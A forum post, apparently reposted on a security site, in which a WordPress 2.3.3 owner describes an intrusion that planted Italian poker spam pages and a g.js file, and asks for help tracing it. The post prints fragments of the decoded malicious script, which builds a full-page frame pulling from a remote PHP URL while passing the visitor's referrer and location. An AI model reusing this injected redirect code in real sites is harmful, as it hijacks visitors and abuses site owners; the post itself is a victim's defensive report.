Home Home   Your IP: Forum [Blog]

-: Exploits - Bugs - Vulnerabilities :-

Wordpress 2.3.3 Exploit/Vulnerability - Adds Spam Directory

Tonight, while checking my site backup's sync log, I noticed a folder named "1" in the output, residing at the top level of the wp-content folder. Within the "1" folder, there are 71 separate files -- 70 poker-site-spammy HTML pages, each in Italian, and one g.js file. There was also a folder named backup-6bb0d, which contained a zero-byte index.php, at the top level of the wp-content folder. The wp-content's index.php file (which just says 'silence is golden') had also been edited or replaced -- but the only change is a blank line on row one. My site itself wasn't hacked -- all files and folders are just fine. No new stories or comments or users were created, etc. It seems the extent of the hack was creating the "1" folder.

I checked my sftp, ftp, and access logs, and there's nothing suspicious there at all -- which makes me suspect this is some sort of injection attack. I searched the logs around the time the files were created, but with my limited technical skills, noting seemed out of whack (there are no references to "poker.html" in any of the log files, for instance). The g.js file contains one "var str" definition that's ASCII encoded; I decoded it and got this output (line breaks added for readability):

var referer = escape(document.referrer);"
"var fromd = escape(document.location);"
"document.write("<fram"+"eset frame"+"border=0
frames"+"pacing=0 border=0 rows=\"1"+"00%, *
\"noresize><fr"+"ame name=\"online\" src=\""+
&c="+subacc+"&from="+fromd+"\" noresize></fra"+"meset>");

That means nothing at all to me. Here's the full .js file, with the "var str" bit removed, given it's shown above:

function Decode()
var temp="",i,c=0,out="";
var str="118#97#114#32#etc as decoded above...;
function r(keyw, cat, lang)
document.write("<script language='javascript'>");
document.write("var fid='http://www.preserve"+"sight"+"colorado.org/feb.php?2'; var q1='"+keyw+"';
var lang='"+lang+"'; var subacc='"+cat+"';");

In the HTML files themselves, there are only four links. The first three are external links, but they simply go to the Italian versions of Google, MSN, and Yahoo (nothing passed with the URLs at all, just the root). The fourth is an href link back to the document itself, like this:

<a href="giochi-poker-gratis-da-scaricare.html">giochi poker gratis da scaricare</a>

I'm not sure if the Javascript works (somehow?) with that last URL, but that's all that's in each file (I'll gladly send anyone the folder if you want to take a look at the whole thing). I also Googled on one of the less-commonly-named files, and found that my site is not alone. As you can see there, a number of WordPress sites contain the "1" folder and associated HTML files.

My site runs WordPress 2.3.3, but I do use a number of third-party plug-ins -- and that's where my suspicions lie for the most likely culprit. However, I don't have any idea how to go about figuring out how someone got in ... nor if there are better places than this to report an apparent security issue. So if anyone can offer any advice, I'd welcome it!


© 2014 Insecure Lab, India                               Affiliates | Contact